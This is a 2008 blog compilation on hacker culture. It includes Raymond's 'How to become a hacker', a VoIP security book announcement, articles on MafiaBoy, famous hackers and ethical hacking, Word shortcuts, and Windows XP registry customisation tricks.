Linus Torvalds, a Finn, comments his code in English (it apparently never occurred to him to do otherwise). His fluency in English has been an important factor in his ability to recruit a worldwide community of developers for Linux. It's an example worth following.

Being a native English-speaker does not guarantee that you have language skills good enough to function as a hacker. If your writing is semi-literate, ungrammatical, and riddled with misspellings, many hackers (including myself) will tend to ignore you. While sloppy writing does not invariably mean sloppy thinking, we've generally found the correlation to be strong — and we have no use for sloppy thinkers. If you can't yet write competently, learn to.

chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

How to become a hacker-ch 1

2008-11-21T00:04:00.003+05:30
Chapter-1

Table of Contents
What Is a Hacker?

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

3. Boredom and drudgery are evil.

4. Freedom is good.

5. Attitude is no substitute for competence.

What Is a Hacker?

The Jargon File contains a bunch of definitions of the term ‘hacker’, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how to become a hacker, though, only two are really relevant.

There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker’. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.

The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music — actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them ‘hackers’ too — and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker’.

There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people ‘crackers’ and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word ‘hacker’ to describe crackers; this irritates real hackers no end.

The basic difference is this: hackers build things, crackers break them.

If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.

The Hacker Attitude

1. The world is full of fascinating problems waiting to be solved.

2. No problem should ever have to be solved twice.

3. Boredom and drudgery are evil.

4. Freedom is good.

5. Attitude is no substitute for competence.

Hackers solve problems and build things, and they believe in freedom and voluntary mutual help. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

But if you think of cultivating hacker attitudes as just a way to gain acceptance in the culture, you'll miss the point. Becoming the kind of person who believes these things is important for you — for helping you learn and keeping you motivated. As with all creative arts, the most effective way to become a master is to imitate the mind-set of masters — not just intellectually but emotionally as well.

Or, as the following modern Zen poem has it:

To follow the path:
look to the master,
follow the master,
walk with the master,
see through the master,
become the master.

So, if you want to be a hacker, repeat the following things until you believe them:

1. The world is full of fascinating problems waiting to be solved.

Being a hacker is lots of fun, but it's a kind of fun that takes lots of effort. The effort takes motivation. Successful athletes get their motivation from a kind of physical delight in making their bodies perform, in pushing themselves past their own physical limits. Similarly, to be a hacker you have to get a basic thrill from solving problems, sharpening your skills, and exercising your intelligence.

If you aren't the kind of person that feels this way naturally, you'll need to become one in order to make it as a hacker. Otherwise you'll find your hacking energy is sapped by distractions like sex, money, and social approval.

(You also have to develop a kind of faith in your own learning capacity — a belief that even though you may not know all of what you need to solve a problem, if you tackle just a piece of it and learn from that, you'll learn enough to solve the next piece — and so on, until you're done.)

2. No problem should ever have to be solved twice.

Creative brains are a valuable, limited resource. They shouldn't be wasted on re-inventing the wheel when there are so many fascinating new problems waiting out there.

To behave like a hacker, you have to believe that the thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

Note, however, that "No problem should ever have to be solved twice." does not imply that you have to consider all existing solutions sacred, or that there is only one right solution to any given problem. Often, we learn a lot about the problem that we didn't know before by studying the first cut at a solution. It's OK, and often necessary, to decide that we can do better. What's not OK is artificial technical, legal, or institutional barriers (like closed-source code) that prevent a good solution from being re-used and force people to re-invent wheels.

(You don't have to believe that you're obligated to give all your creative product away, though the hackers that do are the ones that get most respect from other hackers. It's consistent with hacker values to sell enough of it to keep you in food and rent and computers. It's fine to use your hacking skills to support a family or even get rich, as long as you don't forget your loyalty to your art and your fellow hackers while doing it.)

3. Boredom and drudgery are evil.

Hackers (and creative people in general) should never be bored or have to drudge at stupid repetitive work, because when this happens it means they aren't doing what only they can do — solve new problems. This wastefulness hurts everybody. Therefore boredom and drudgery are not just unpleasant but actually evil.

To behave like a hacker, you have to believe this enough to want to automate away the boring bits as much as possible, not just for yourself but for everybody else (especially other hackers).

(There is one apparent exception to this. Hackers will sometimes do things that may seem repetitive or boring to an observer as a mind-clearing exercise, or in order to acquire a skill or have some particular kind of experience you can't have otherwise. But this is by choice — nobody who can think should ever be forced into a situation that bores them.)

4. Freedom is good.

Hackers are naturally anti-authoritarian. Anyone who can give you orders can stop you from solving whatever problem you're being fascinated by — and, given the way authoritarian minds work, will generally find some appallingly stupid reason to do so. So the authoritarian attitude has to be fought wherever you find it, lest it smother you and other hackers.

(This isn't the same as fighting all authority. Children need to be guided and criminals restrained. A hacker may agree to accept some kinds of authority in order to get something he wants more than the time he spends following orders. But that's a limited, conscious bargain; the kind of personal surrender authoritarians want is not on offer.)

Authoritarians thrive on censorship and secrecy. And they distrust voluntary cooperation and information-sharing — they only like ‘cooperation’ that they control. So to behave like a hacker, you have to develop an instinctive hostility to censorship, secrecy, and the use of force or deception to compel responsible adults. And you have to be willing to act on that belief.

5. Attitude is no substitute for competence.

To be a hacker, you have to develop some of these attitudes. But copping an attitude alone won't make you a hacker, any more than it will make you a champion athlete or a rock star. Becoming a hacker will take intelligence, practice, dedication, and hard work.

Therefore, you have to learn to distrust attitude and respect competence of every kind. Hackers won't let posers waste their time, but they worship competence — especially competence at hacking, but competence at anything is valued. Competence at demanding skills that few can master is especially good, and competence at demanding skills that involve mental acuteness, craft, and concentration is best.

If you revere competence, you'll enjoy developing it in yourself — the hard work and dedication will become a kind of intense play rather than drudgery. That attitude is vital to becoming a hacker.
chapter-1
chapter-2
chapter-3
chapter-4

source:Article written by Sir ESR

Hacking VoIP-- New Book Shows How Easy it Is to Attack VoIP

2008-11-14T23:24:00.002+05:30
Voice over Internet Protocol (VoIP) is an increasingly widespread new technology that allows users to escape the tyranny of big telecom and make phone calls over the Internet. But while VoIP may be cheap and convenient, it's notoriously lacking in security. With little effort, attackers can eavesdrop on conversations, disrupt phone calls, inject content into existing conversations, change caller IDs, and access sensitive information-all without the awareness of the VoIP users making the phone calls.

Hacking VoIP ( No Starch Press, October 2008, 232 pp, ISBN 9781593271633 ) approaches VoIP security from two angles, explaining VoIP's many security holes to both hackers and administrators. The book raises awareness of the importance of VoIP security, describes potential attacks, explains VoIP's biggest weaknesses, and offers solutions for protecting against potential exposure and attacks. Readers learn how to defend against VoIP attacks as they explore issues with VoIP security and the boundaries of VoIP protocols.

"VoIP is fun, but it's remarkably easy to attack," said No Starch Press founder Bill Pollock. "People think that when they pick up the telephone they're on a secure line, but not when that call is being made over VoIP. Hacking VoIP demonstrates just how easy it is to attack VoIP, and how best to plug those security holes."

Hacking VoIP explains every aspect of VoIP security, discusses popular security assessment tools, and explores the inherent vulnerabilities of common hardware and software packages. Readers learn how to:

Identify and defend against VoIP security attacks such as eavesdropping, audio injection, caller ID spoofing, and VoIP phishing
Audit VoIP network security and assess the security of enterprise-level VoIP networks such as Cisco, Avaya, and Asterisk and home implementations like Yahoo! and Vonage
Use VoIP protocols like H.323, SIP, RTP, and IAX
Locate potential vulnerabilities in any VoIP network
Use both existing and newly released VoIP security tools
Whether setting up and defending VoIP networks against attacks or just having sick fun testing the limits of VoIP security, Hacking VoIP is every user's go-to source for VoIP security and defense.

For more information
visit www.nostarch.com

[basics]WINDOWS SHORTCUTS

2008-10-31T20:13:00.002+05:30
You can avoid reaching for the mouse if you are familiar with keyboard shortcuts. If you forget one of these, use the mouse and go to the menu bar. In each pull down menu you will see keyboard commands given in the right side of the window.

Commonly used keyboard combinations

Ctrl+N Open a new word document quickly.
Ctrl+O Opens a previously saved document.
Ctrl+W Closes the active window, but does not Exit Word.
Ctrl+S Saves the active document with its current file name, location and format.
Ctrl+P Prints the active file, also gives the opportunity to change print options
Alt+F4 Exit - Closes Microsoft Word.
Ctrl+Z Undo the last action. This selection can be repeated several times.
Ctrl+Y Redo - After an action has been undone, it can be reinstated in the document.

Ctrl+X Cut- Removes the selection from the active document and places it on the clipboard.
Ctrl+C Copies the selection to the clipboard
Ctrl+V Paste - Inserts the contents of the clipboard at the insertion point (cursor) or whatever is selected.
Ctrl+A Selects all text and graphics in the active window.
Ctrl+F Find - Searches for specified text in the active document
Ctrl+B Bold - Formats selected text; make text bold, or remove bold formatting
Ctrl+I Italic - Formats selected text; make text italic or remove italic
Ctrl+U Underline - Formats selected text; make text underlined or remove underline

real tricks 5

2008-10-31T20:11:00.003+05:30
Change Start Button Text in Windows

First you need to download this software below.....
http://www.softpedia.com/progDownload/Resource-Hacker-Download-1520.html
then follow the below steps after opening resource hacker
1. Open “%windir%\Explorer.exe” file in Resource Hacker.

2. Goto:
“String Table -> 37 -> 1033 -> 578” (If you are using Luna theme)
“String Table -> 38 -> 1033 -> 595“ (If you are using Windows Classic theme)
3. You’ll get a string “start”. Just change it with whatever text you want to show. Make sure you put
quotes.
4. Compile the script and save the file. Thats it. You have done.
also save this settings as "newexplorer.exe"
now navigate to
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon
In the right pane, double click the Shell entry to open the Edit String dialog box. In Value data:
line, enter the name that was used to save the modified explorer.exe file. Click OK
Close Registry Editor and either log off the system and log back in
have fun
comments please!!!
but no offences

MafiaBoy is Back!!!

2008-10-27T19:51:00.003+05:30
Yes he is back!!!The 16- year old kid who brought down the internet biggies like yahoo and CNN.com to there knees way back in 2000.Michael Calce reintroduces himself in his new book.

If you dont know whom i am talking about,you may like to know about ten biggest legends of hackers on universe first.

Most people, even the computer illiterate, know him as Mafiaboy, the online nickname he used while causing havoc on the Internet in 2000 by temporarily shutting down websites like Yahoo.com and CNN.com.

By bombarding such e-commerce goliaths with a series of information overloads, known as denial-of-service attacks, Calce caught the undivided attention of an industry very high on its potential in 2000. Not bad for a 15-year-old boy working from a personal computer in his father's home in tranquil Ile Bizard.

But his book, Mafiaboy: How I Cracked the Internet and Why it's Still Broken, co-written with Montreal journalist Craig Silverman, is not a boastful tale.

"The ultimate goal of the book is to say, 'Here is my story. This is what I experienced.' Hopefully, it will prevent a Mafiaboy 2.0," said Calce, slipping in a computer reference likening a potential hacker to a software update. Now 23, Calce hopes to return to school and continue his current work as a computer consultant.

"I want to get the message across that I realize what I did was wrong so hopefully other people won't do the same thing. I wanted to let the reader become me and see what I went through. Hopefully, when they read this they'll say, 'I don't want to go through what this kid went through.' Nobody should lose four years of their life," he said, referring to the length of time he was caught up in the justice system.

Full of many behind-the-scenes surprises, the book is a remarkably detailed account of Calce's life leading up to the attacks and what happened to him afterward. He was arrested by the RCMP and dragged through a media frenzy while experts tried to grasp what he had actually accomplished. He was charged, eventually pleaded guilty, and spent eight months in a youth home.

Although his identity was protected in Canada under legislation protecting young offenders, several U.S. media outlets published his name.

At the start of the investigation, speculation placed Mafiaboy among the most sophisticated hackers on the Internet. By the time of his arrest, Calce was criticized among his peers and police who ranked him as a "script-kiddie," or an amateur hacker.

While serving as a cautionary tale, the book also challenges those opinions.

It details how Calce methodically stole bandwidth from hundreds of computers while preparing for his first attack on Yahoo.com, which was merely intended as a test to impress experienced hackers he admired.

"Obviously, (the RCMP) downplayed what I did, which is fine. I don't resent it and it doesn't bother me. Let them say whatever they want to say. I know the truth and I felt the story was misinterpreted," Calce said.

"Even some IT security experts came forward and said 'it's rather easy to do what he did.' I don't know what these people were doing when they were 15 years old. But when you're 15 and you're breaching university (computer networks), making a network, preparing to launch a denial-of-service attack, I don't think it's easy at all."

"It was weird. (The RCMP) didn't want people to panic, but at the same time, they were saying any 15-year-old could do this."

The book is more than just a rehashing of events. It is at times a very personal look at the realities of a young teenager growing up among divorced parents while simply not fitting into the structured environment of high school. Silverman interviewed several of Calce's friends and closest relatives while also researching the background of the RCMP's investigation.

The book is not just about how Calce saw the world while it was so interested in him back in 2000, but also about how the world saw him.

"There is some touchy stuff in there. But if you're going to do the book, you have to sort of go all the way. You have to lay everything out," Silverman said, while acknowledging not everyone will like Calce as a teenager.

"There are parts of his life that aren't flattering. There are parts where he was obviously doing bad things. They are in there. That's another thing that makes the book worth doing. I didn't get any push back from Michael to leave those things out. The flaws are in there. It is not a whitewash, and, hopefully, people will see it as a cautionary tale and not a celebration of what happened. That would be the worst-case scenario."

Calce agrees that the best approach was to show his life as it was back then, warts and all.

"We didn't try to make it look like I was a good guy," he said. "I admit to being a trash talker and admit to being immature. But what do people expect from a 15-year-old?"

you may like reading:-Ten biggest legends of hacker universe.

source:internet

Hacking: A Research Paper

2008-10-18T19:14:00.003+05:30
What do you think of when I say the word “Computer Hacker”? You probably think of some sort of criminal bent on gaining access into your bank accounts or remote control over your computer. Granted, hackers have gotten a bad reputation from the media, who sometimes report break-ins of databases, computers, and other virtual resources. However, this does not mean that every hacker has a desire to do harm. In fact, hackers are hardly the bad guys. The word hacker has been so warped and distorted by the media that people now believe that hackers are all criminals and intend to do harm. The truth is, hackers are people and therefore many of them have morals that disallow them to purposely cause harm. I believe that regardless of the stereotypical view of hackers in today’s society, the majority of them help the world of computers rather than damage it. Action should be taken against the people who make the internet unsafe, not the people who make the internet safer.

According to an article in Whatis.com, hackers primarily come in different shades or colors. The article goes on to say that these colors are significant in determining what kind of hacker he/she is. The lighter the color, the less harm a hacker intends. For example, a hacker with good intent and moral standing is called a white hat hacker. Another point made in the article was that the word “hat” after the color of the hacker is meant to be symbolic of old Western movies where the hero always wore a white hat and “bad guys” wore the black hats (Whatis.com). Black hat hackers, as you may have guessed, are the hackers who do intend harm. They deface websites, steal data, and exploit security flaws for personal gain. Black hats are sometimes called “crackers” as well because they crack programs and passwords to gain entry into a location where they are unauthorized to be (morebusiness.com). There are also hackers who are referred to as gray hat hackers. These are the hackers who have ethics, know what’s right but sometimes act in a negative way when they find a security hole. A gray hat may find a security hole in a website that allows him/her to edit the index page, which is generally the front page of a website, and he/she may exploit it and deface it (usually they only do things that can be easily repaired). Shortly after, he/she may alert the webmaster of the issue with the site (Parker). Gray hats would not do anything more serious than that. The only real bad guys are the crackers/black hats who may gain control over someone’s personal computer only to flood it with spyware. GCIA worker Don Parker says, “What the media attention has resulted in, is an often times distorted reality. The media has given all of this negative attention to hackers, the good guys! Now they are looked at with contempt.”
People were first introduced to hacking when the movie “War Games” came out in 1983. The same year, six teenagers were arrested for breaking into about sixty computers, some of which were government owned and operated machines (pcworld.com). This was probably the time that hackers began to become hated by people because at the time, they didn’t know the potential that there was for hacking to be used for good. Hacking back then was the same as cracking is now. Only about three years later, Congress passed the Computer Fraud and Abuse Act which made it a crime to hack into computers. In 1987, the government organized its first group of computer experts called “Red Teams” to hack its own servers. Since then, even large companies like IBM have maintained its own group of hackers to test their own security since 1990 (searchsecurity.techtarget.com).

Even though computer hacking of today’s time is generally frowned upon, there are still plenty of people who make an honest living out of it. Just as there is an alternate name for black hat hackers, there is an alternate name for the white hat hackers. White hats today are called IT technicians. IT is short for Information Technology. Their job is keep the internet, as well as businesses, safe from crackers. Some companies pay skilled ITs to attempt to hack their servers and computers to test their security. This is called penetration testing and is basically just ethical hacking. If the hacker is successful in gaining entry into the company’s database or find any exploits, he/she will alert the company of the problem and inform them on how to go about fixing the problem.
Webopedia (http://www.webopedia.com) defines a hacker as “A slang term for a computer enthusiast, i.e., a person who enjoys learning programming languages and computer systems and can often be considered an expert on the subject(s).” The definition goes on to mention of the press warping the term to refer to someone who gains access to a computer system in order to steal or destroy data. Delving even further into the article, it goes on to mention that hackers themselves call these criminals crackers.

I’ve already mentioned that an IT’s work is called penetration testing or ethical hacking. However, ethical hacking doesn’t just refer to hacking under contract. Many white hat hackers out there hack into websites or web servers simply for the fun and challenge of doing it. Even if they aren’t affiliated with the company or person who owns the website, the said white hat immediately alerts the webmaster about the security issue upon discovery. This is much like a considerate person finding someone else’s lost valuable lying in the street and then contacting the owner to return it (Parker). Both the white hat’s actions as well as the considerate person actions are ethical in nature.

Organizations such as HackThisSite.org (HTS to most of its members) promote ethical hacking. They offer a training ground for any hacker that wishes to learn more in a safe, legal environment. People of the HTS community share tips and experiences as well as articles promoting the benign use of computer skill. HTS administrator, Silent-Shadow, writes in one article “People that hack for malicious intent violate everything that HTS stands for. HTS is here so that people can learn to find security holes in websites so that they can notify a webmaster of the security issue.” HTS is a living, breathing example of a white hat hacker community.
Crackers and hackers compete for control over servers even now. “As crazy as it seems, there is a war going on out there for the internet,” (qtd. in Kerstein) says Dr. Tom Porter, Ph.D, “Getting into systems is good or bad depending on your vantage point.” (qtd. in Kerstein) Tom Porter works for the World Cup IT community. He reports that the IT community has gotten much better at security the past few years. According to him, IT members are always one step ahead of crackers and malicious hackers (Kerstein). The technology and tools that is offered today can help battle almost any kind of cracking attempt.

Some hackers and IT workers use collections of phony files and information called honey pots (also called goat files) to lure a cracker (Wang). A honey pot has three main purposes. It lures the cracker away from real, private data that he/she may possibly destroy. Then it alerts the system administrator of the cracker’s actions the moments he/she begins to tamper with the phony data. Hopefully, the phony data will keep the cracker occupied until the authorities track him/her down to their physical location (Wang).

Until the headlines stop reading “Hacker attacks webserver” and start reading “Cracker attacks webserver”, people will continue to be confused on who the real bad people in the virtual world are. Something must be done to stop all of the crackers for ruining the internet experience for everybody, and I think that the only thing that can stop them is the counter movements of the ethical white hat hackers. Without the white hats, the internet would be a lot more unsafe to surf and would probably call for severe governmental action.
by: Radical Dreamer
original post: http://www.hackthissite.org/articles/read/941

The Ten Biggest Legend of the Hacker Universe

2008-10-16T21:42:00.005+05:30
well its always tough to stay who is the best.But still here is a refrence to hackers who got popularity as the gaints in the business...

Kevin Mitnick: Known worldwide as the “most famous hacker” and for having been the first to serve a prison sentence for infiltrating computer systems. He started dabbling when he was a minor, using the practice known as phone phreaking. Although he has never worked in programming, Mitnick is totally convinced that you can cause severe damage with a telephone and some calls. These days, totally distanced from his old hobbies and after passing many years behind bars, he works as a security consultant for multinational companies through his company “Mitnick Security.”

Gary McKinnon: This 41-year-old Scotsman, also known as Solo, is the perpetrator of what’s considered the biggest hack in the history of computer science - into a military system. Not satisfied with this, in the years 2001 and 2002, he made a mockery of the information security of NASA itself and the Pentagon. Currently he is at liberty awarding his extradition to the U.S. and prohibited access to a computer with Internet connection.

Vladimir Levin: This Russian biochemist and mathematician was accused of having committed one of the biggest bank robberies of all times by means of the cracking technique. From Saint Petersburg, Levin managed to transfer funds estimated at approximately 10 million dollars from Citibank in New York to accounts he had opened in distant parts of the world. He was arrested by INTERPOL in 1995 at Heathrow airport (England). Although he managed to rob more than 10 million dollars, he was only sentenced to three years in prison. Currently he is free.

Kevin Poulsen: Today he may be a journalist and collaborates with authorities to track paedophiles on the Internet, but Poulsen has a dark past as a cracker and phreaker. The event that brought him the most notoriety was taking over Los Angeles phone lines in 1990. A radio station was offering a Porsche as a prize for whoever managed to be caller number 102. It goes without saying that Poulsen was the winner of the contest.

Timothy Lloyd: In 1996, information services company Omega, provider of NASA and the United States Navy, suffered losses of around 10 million dollars. And it was none other than Tim Lloyd, an x-employee fired some weeks earlier, who was the cause of this financial disaster. Lloyd left a virtually activated information bomb in the company’s codes, which finally detonated July 31 of that same year.

Robert Morris: Son of one of the forerunners in the creation of the virus, in 1988 Morris managed to infect no fewer than 6,000 computers connected to the ArpaNet network (one of the precursors to the internet) He did it from the prestigious Massachusetts Institute of Technology (MIT) and for his criminal activities he earned a four year prison sentence, which was finally reduced to community service.

David Smith: Not all hackers can boast of creating the virus that spread the fastest to computers the width and breadth of the globe - David Smith can. In 1999, the father of the Melissa virus managed to infect and crash 100,000 email accounts with his malicious creation. Smith, who was thirty years old at the time, was sentenced and freed on bail.

MafiaBoy: In February of 2000, many of the most important online companies in the US, such as eBay, Yahoo and Amazon, suffered a technical glitch called Denial of Service, which caused a total of 1700 million dollars in losses. But did these sites know that the perpetrator of the attack was a 16 year-old Canadian who responded to the alias MafiaBoy? Surely not, although it didn’t take them long to find out, thanks to his bragging about his bad deed to his classmates at school.

Masters of Deception (MoD): MoD was a New York cyber-gang that reached its apogee in the early 90s. Under the cover of different aliases, its biggest attacks involved taking over telephone lines and centres of the Internet, then still in its infancy. During this time McD starred in the historic “battles of the hackers,” along with other groups like the Legion of Doom (LoD), as they sought to destroy each other until the computers couldn’t take it anymore.

Richard Stallman: Since the early 80s when he was a hacker specializing in artificial intelligence, this hippie-looking New Yorker has been one of the most active militants in favour of free software. At MIT he firmly opposed the privatization of the software used by the institute’s laboratory, so much so they he created what today is known as GNU and the concept of CopyLeft. Popular systems like Linux utilize the GNU mode and Stallman is currently one of the gurus of software democratization.

You may like to read:-MafiaBoy is back!!

Real Tricks -4

2008-10-14T23:05:00.007+05:30
Restore The Missing Folder Documents In My Computer
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/DocFolderPaths
Click Edit > New > String Value and give appropriate name with username which is used in Windows (Ex: W5A)
Double click at those value and insert location path where your Documents is (Ex: D:\Documents)

Removing File Stored from My Computer
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/MyComputer/NameSpace/DelegateFolders
Delete subkey {59031a47-3f72-44a7-89c5-5595fe6b30ee} by pressing Del button.

Hide My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Click Edit > New > DWORD Value and give name NoRecentDocsMenu.
Then double click at those DWORD Value, and once again give value 1 to activated.

Hide Find Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Click Edit > New > DWORD Value and give name NoFind.
Then double click at those DWORD Value and give value 1 to activated. Restart computer.

Hide Help And Support
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Make a new DWORD Value - Menu Edit > New > DWORD Value, and give name NoSMHelp.
Then double click at NoSMHelp and fill with value 1 in Value Data. Restart computer.

Hide Run Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Make a new DWORD Value and give name NoRun. Double click and insert value 1 as Value Data.

Hide Run Menu From Start Menu (2)
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Find value called Start_ShowRun, double click and insert value 0 in Value Data.

Hide Log Off
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Click Edit > New > Binary Value and give name NoLogOff.
Double click at NoLogOff and insert value 01 00 00 00 in Value Data.

Hide Turn Off Computer Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Click Edit > New > DWORD Value and give name NoClose.
Double click NoClose and give value 1 in Value Data.

Cleartype At Logon Screen
HKEY_USERS/.DEFAULT/Control Panel/Desktop
Double click FontSmoothingType and insert value 2 in Value Data.

Make Different Looks At Logon Screen
HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/ThemeManager
Double click ColorName and insert Metallic text in Value Data.

Show Administrator At Welcome Screen
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t
Make a new DWORD Value and give name Administrator.
Double click Administrator and insert value 1 in Value Data.

Automatic Login
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon
Double click AltDefaultUserName and insert chosen username account.
Double click AutoAdminLogon and insert value 1 in Value Data.
Make a new DWORD Value ad give name DefaultPassword.
Double click DefaultPassword and insert chosen password account in Value Data.

Hide Printer Icon & Faxes from Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Find value called Start_ShowPrinters and give value 0 in Value Data.

Hide Control Panel From Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Find value called Start_ShowControlPanel and double click at those part.
Insert value 0 in Value Data.

Hide My Pictures From Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click at Start_ShowMyPics and insert value 0 in Value Data.

Show Administrative Tools Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click at StartMenuAdminTools and give value 1 in Value Data.

Minimize Start Menu Icon
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click at Start_LargeMFUIcons and insert value 1 in Value Data.

Erase Username At Start Menu
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer
Choose Edit > New > DWORD Value and give name NoUserNameInStartMenu.
Double click NoUserNameInStartMenu and insert value 1 in Value Data.

Prevent Any Change from Start Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Make a new DWORD Value and give name NoChangeStartMenu.
Double click NoChangeStartMenu and insert alue 1 in Value Data.

Hide My Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click Start_ShowRecentDocs and insert value 0 in Value Data.

Change Important Default Shortcut Name In Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/CLSID
Double click at default value for each subkey below:
My Network Places:
{208D2C60-3AEA-1069-A2D7-08002B30309D}
My Computer:
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
My Documents:
{450D8FBA-AD25-11D0-98A8-0800361B1103}
Recycle Bin:
{645FF040-5081-101B-9F08-00AA002F954E}
Default IE Icon:
{871C5380-42A0-1069-A2EA-08002B30309D}
Insert unique name as the substitute default name.

Hide Icon In Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click at HideIcons and insert value 1 in Value Data.

Cleaning All Icon At Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Make a new DWORD Value and give name NoDesktop.
Double click at NoDesktop and insert value 1 in Value Data.

Make Desktop More Stable
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer
Make a new DWORD Value and give name DesktopProcess.
Doubl click DesktopProcess and insert value 1 in Value Data.

Deleting Program List On Run Menu
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU
At the right window, you will see many software in a row (marked as alphabet a, b, c, d, etc).
To erase it, simply by choosing 1 of (or all) existed program name and press Del button
If it show confirmation window to deleting data, choose Yes.

Cleaning Recent Documents
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Make a new DWORD Value and give name NoRecentDocsHistory.
Double click at NoRecentDocsHistory and insert value 1 in Value Data.

Vanishing Info Tip At Folders Icon In Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click FolderContentsInfoTip with value 0.

Lock Taskbar
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/Advanced
Double click at TaskBarSizeMove and insert value 0 in Value Data.

Deleting Past Items Icons In Taskbar
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\TrayNotify
Erase IconStreams and PastIconsStream, then open Task Manager, at Tab Processes right click at explorer.exe and choose End Process.
Click File > New Task (Run) and re-type explorer and press OK.
Real tricks-1
Real tricks-2
Real tricks-3
Real tricks-4

Real Tricks -3

2008-10-14T23:01:00.009+05:30
To Speed up Registry Update
Go to Start > Log Off > Log Off. OR restart expolrer.exe

Change Wallpaper
HKEY_CURRENT_USER/Control Panel/Desktop
Double click at wallpaper and insert the desired path picture in Value Data.

Change Recycle Bin Name
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
Double click at option (Default value) give new desired name in Value Data.

Show Rename In Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Double click at Attributes > Edit Binary Value. In Value Data, change those value into 0000 50 01 00 20.

Hide Recycle Bin
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace
Delete subkey {645FF040-5081-101B-9F08-00AA002F954E}, then Restart computer to see the result.
To show it back, make again the digit number combination {645FF040-5081-101B-9F08-00AA002F954E}.

Adding Shortcut Content Menu In Recycle Bin
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/ShellFolder
Double click Attributes and change digit number in Value Data with the following:
0000 50 01 00 20 > Rename
0000 60 01 00 20 > Delete
0000 70 01 00 20 > Rename & Delete
0000 41 01 00 20 > Copy
0000 42 01 00 20 > Cut
0000 43 01 00 20 > Copy & Cut
0000 44 01 00 20 > Paste
0000 45 01 00 20 > Copy & Paste
0000 46 01 00 20 > Cut & Paste
0000 47 01 00 20 > Cut, Copy & Paste

Adding Shortcut Content Menu In Recycle Bin With Selection Menu
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}/Shell
Click Edit > New > Key give the desired name (ex: Go To Windows Explorer).
Under those new key, go to menu Edit > New > Key again make another new key called Command.
